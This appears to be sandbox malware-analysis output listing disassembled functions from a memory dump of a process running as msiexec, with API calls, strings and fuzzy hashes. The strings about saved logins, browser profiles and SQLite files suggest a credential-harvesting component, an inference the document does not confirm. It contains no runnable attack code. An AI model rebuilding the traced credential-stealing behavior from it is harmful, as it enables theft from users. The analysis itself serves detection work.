                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                    • String ID: r!A
                                                    • API String ID: 2791114272-628097481
                                                    • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                    • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                    • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                    • String ID: BIN
                                                    • API String ID: 1668488027-1015027815
                                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                    APIs
                                                    • memset.MSVCRT ref: 00411AF6
                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                    • wcscat.MSVCRT ref: 00411B2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                    • String ID: AE$.cfg$General$EA
                                                    • API String ID: 776488737-1622828088
                                                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                    APIs
                                                    • memset.MSVCRT ref: 0040D8BD
                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                    • memset.MSVCRT ref: 0040D906
                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                    • String ID: sysdatetimepick32
                                                    • API String ID: 1028950076-4169760276
                                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                    APIs
                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                    • memset.MSVCRT ref: 0041BA3D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memset
                                                    • String ID: -journal$-wal
                                                    • API String ID: 438689982-2894717839
                                                    • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                    • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Item$Dialog$MessageSend
                                                    • String ID:
                                                    • API String ID: 3975816621-0
                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                    APIs
                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                    • String ID: .save$http://$https://$log profile$signIn
                                                    • API String ID: 1214746602-2708368587
                                                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                    • memset.MSVCRT ref: 00405E33
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                    • String ID:
                                                    • API String ID: 2313361498-0
                                                    • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                    • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageRectSend$Client
                                                    • String ID:
                                                    • API String ID: 2047574939-0
                                                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                    APIs
                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                    • String ID:
                                                    • API String ID: 4218492932-0
                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                    APIs
                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memset
                                                    • String ID: gj
                                                    • API String ID: 438689982-4203073231
                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                    APIs
                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                    • API String ID: 3510742995-2446657581
                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                    • memset.MSVCRT ref: 00405ABB
                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                    • SetFocus.USER32(?), ref: 00405B76
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$FocusItemmemset
                                                    • String ID:
                                                    • API String ID: 4281309102-0
                                                    • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                    • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _snwprintfwcscat
                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                    • API String ID: 384018552-4153097237
                                                    • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                    • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                    • String ID: 0$6
                                                    • API String ID: 2029023288-3849865405
                                                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                    APIs
                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                    • memset.MSVCRT ref: 00405455
                                                    • memset.MSVCRT ref: 0040546C
                                                    • memset.MSVCRT ref: 00405483
                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$memcpy$ErrorLast
                                                    • String ID: 6$\
                                                    • API String ID: 404372293-1284684873
                                                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AttributesErrorFileLastSleep$free
                                                    • String ID:
                                                    • API String ID: 1470729244-0
                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                    APIs
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                    • wcscpy.MSVCRT ref: 0040A107
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                    • String ID:
                                                    • API String ID: 1331804452-0
                                                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                    APIs
                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                    • String ID: advapi32.dll
                                                    • API String ID: 2012295524-4050573280
                                                    • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                    • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                    APIs
                                                    Strings
                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                    • <%s>, xrefs: 004100A6
                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$_snwprintf
                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                    • API String ID: 3473751417-2880344631
                                                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcscat$_snwprintfmemset
                                                    • String ID: %2.2X
                                                    • API String ID: 2521778956-791839006
                                                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _snwprintfwcscpy
                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                    • API String ID: 999028693-502967061
                                                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                    APIs
                                                    • strlen.MSVCRT ref: 00408DFA
                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                    • memset.MSVCRT ref: 00408E46
                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
